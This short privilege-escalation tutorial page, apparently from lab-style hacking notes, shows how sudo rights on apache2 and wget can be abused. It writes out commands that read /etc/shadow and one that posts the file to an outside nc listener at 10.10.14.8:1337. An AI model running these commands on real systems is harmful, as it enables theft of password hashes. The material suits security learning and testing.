Intended Functionality

Example

After running sudo -l you come across apache2, however it isn't in gtfobins.

Quick google search can lead you here.

Apache 2 has the ability to read files so you can abuse this by reading the shadow file

sudo apache2 -f /etc/shadow

Another example could be with wget and sending yourself the shadow file with POST and a nc listener

sudo wget --post-file=/etc/shadow 10.10.14.8:1337
PreviousShell EscapingNextLD_PRELOAD